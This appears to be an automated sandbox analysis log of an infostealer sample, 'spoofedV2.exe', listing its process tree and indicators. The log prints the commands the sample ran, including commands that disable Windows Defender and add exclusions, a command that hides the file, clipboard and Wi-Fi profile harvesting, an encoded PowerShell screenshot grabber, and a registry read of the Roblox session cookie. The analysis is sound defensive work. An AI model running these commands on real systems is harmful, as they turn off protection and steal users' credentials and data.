Token: SeProfSingleProcessPrivilege	3436	WMIC.exe
Token: SeIncBasePriorityPrivilege	3436	WMIC.exe
Token: SeCreatePagefilePrivilege	3436	WMIC.exe
Token: SeBackupPrivilege	3436	WMIC.exe
Token: SeRestorePrivilege	3436	WMIC.exe
Token: SeShutdownPrivilege	3436	WMIC.exe
Token: SeDebugPrivilege	3436	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3436	WMIC.exe
Token: SeRemoteShutdownPrivilege	3436	WMIC.exe
Token: SeUndockPrivilege	3436	WMIC.exe
Token: SeManageVolumePrivilege	3436	WMIC.exe
Token: 33	3436	WMIC.exe
Token: 34	3436	WMIC.exe
Token: 35	3436	WMIC.exe
Token: 36	3436	WMIC.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	1652	tasklist.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
848	OneDrive.exe
848	OneDrive.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
848	OneDrive.exe
848	OneDrive.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
848	OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4308 wrote to memory of 352	4308	spoofedV2.exe	77
PID 4308 wrote to memory of 352	4308	spoofedV2.exe	77
PID 352 wrote to memory of 3684	352	spoofedV2.exe	78
PID 352 wrote to memory of 3684	352	spoofedV2.exe	78
PID 352 wrote to memory of 4000	352	spoofedV2.exe	79
PID 352 wrote to memory of 4000	352	spoofedV2.exe	79
PID 352 wrote to memory of 2848	352	spoofedV2.exe	80
PID 352 wrote to memory of 2848	352	spoofedV2.exe	80
PID 352 wrote to memory of 3928	352	spoofedV2.exe	81
PID 352 wrote to memory of 3928	352	spoofedV2.exe	81
PID 352 wrote to memory of 4312	352	spoofedV2.exe	86
PID 352 wrote to memory of 4312	352	spoofedV2.exe	86
PID 4000 wrote to memory of 1840	4000	cmd.exe	88
PID 4000 wrote to memory of 1840	4000	cmd.exe	88
PID 2848 wrote to memory of 3544	2848	cmd.exe	89
PID 2848 wrote to memory of 3544	2848	cmd.exe	89
PID 3684 wrote to memory of 1944	3684	cmd.exe	90
PID 3684 wrote to memory of 1944	3684	cmd.exe	90
PID 3928 wrote to memory of 1828	3928	cmd.exe	91
PID 3928 wrote to memory of 1828	3928	cmd.exe	91
PID 4312 wrote to memory of 1104	4312	cmd.exe	92
PID 4312 wrote to memory of 1104	4312	cmd.exe	92
PID 352 wrote to memory of 3432	352	spoofedV2.exe	93
PID 352 wrote to memory of 3432	352	spoofedV2.exe	93
PID 352 wrote to memory of 4816	352	spoofedV2.exe	94
PID 352 wrote to memory of 4816	352	spoofedV2.exe	94
PID 4816 wrote to memory of 3344	4816	cmd.exe	97
PID 4816 wrote to memory of 3344	4816	cmd.exe	97
PID 3432 wrote to memory of 3160	3432	cmd.exe	98
PID 3432 wrote to memory of 3160	3432	cmd.exe	98
PID 352 wrote to memory of 2296	352	spoofedV2.exe	100
PID 352 wrote to memory of 2296	352	spoofedV2.exe	100
PID 352 wrote to memory of 4284	352	spoofedV2.exe	101
PID 352 wrote to memory of 4284	352	spoofedV2.exe	101
PID 352 wrote to memory of 3776	352	spoofedV2.exe	103
PID 352 wrote to memory of 3776	352	spoofedV2.exe	103
PID 352 wrote to memory of 2220	352	spoofedV2.exe	105
PID 352 wrote to memory of 2220	352	spoofedV2.exe	105
PID 352 wrote to memory of 4840	352	spoofedV2.exe	107
PID 352 wrote to memory of 4840	352	spoofedV2.exe	107
PID 352 wrote to memory of 3328	352	spoofedV2.exe	110
PID 352 wrote to memory of 3328	352	spoofedV2.exe	110
PID 352 wrote to memory of 2020	352	spoofedV2.exe	111
PID 352 wrote to memory of 2020	352	spoofedV2.exe	111
PID 352 wrote to memory of 2136	352	spoofedV2.exe	112
PID 352 wrote to memory of 2136	352	spoofedV2.exe	112
PID 2296 wrote to memory of 3436	2296	cmd.exe	116
PID 2296 wrote to memory of 3436	2296	cmd.exe	116
PID 2020 wrote to memory of 2116	2020	cmd.exe	117
PID 2020 wrote to memory of 2116	2020	cmd.exe	117
PID 3776 wrote to memory of 1388	3776	cmd.exe	118
PID 3776 wrote to memory of 1388	3776	cmd.exe	118
PID 2220 wrote to memory of 4504	2220	cmd.exe	119
PID 2220 wrote to memory of 4504	2220	cmd.exe	119
PID 4284 wrote to memory of 1028	4284	cmd.exe	120
PID 4284 wrote to memory of 1028	4284	cmd.exe	120
PID 4840 wrote to memory of 4620	4840	cmd.exe	121
PID 4840 wrote to memory of 4620	4840	cmd.exe	121
PID 3328 wrote to memory of 3332	3328	cmd.exe	122
PID 3328 wrote to memory of 3332	3328	cmd.exe	122
PID 2136 wrote to memory of 3508	2136	cmd.exe	123
PID 2136 wrote to memory of 3508	2136	cmd.exe	123
PID 352 wrote to memory of 4388	352	spoofedV2.exe	124
PID 352 wrote to memory of 4388	352	spoofedV2.exe	124

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1000	attrib.exe
1828	attrib.exe
3056	attrib.exe

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4308
- C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
  "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()"
      4⤵
      PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"
      4⤵
      Views/modifies file attributes
      PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3328
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3508
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.cmdline"
        5⤵
        
        PID:2004
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E9.tmp" "c:\Users\Admin\AppData\Local\Temp\mztqsn5r\CSCF4D9769ABFF04899BC49BE9CC0D64E8.TMP"
        6⤵
        
        PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4388
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1684
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4680
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4032
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3868
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:764
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3564
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:572
